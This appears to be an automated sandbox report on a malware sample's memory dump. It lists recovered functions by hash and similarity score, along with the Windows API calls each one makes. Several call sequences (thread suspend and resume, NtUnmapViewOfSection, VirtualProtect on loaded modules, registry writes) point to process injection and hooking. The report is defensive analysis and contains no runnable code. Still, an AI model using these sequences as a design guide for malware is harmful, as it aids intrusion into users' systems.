  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
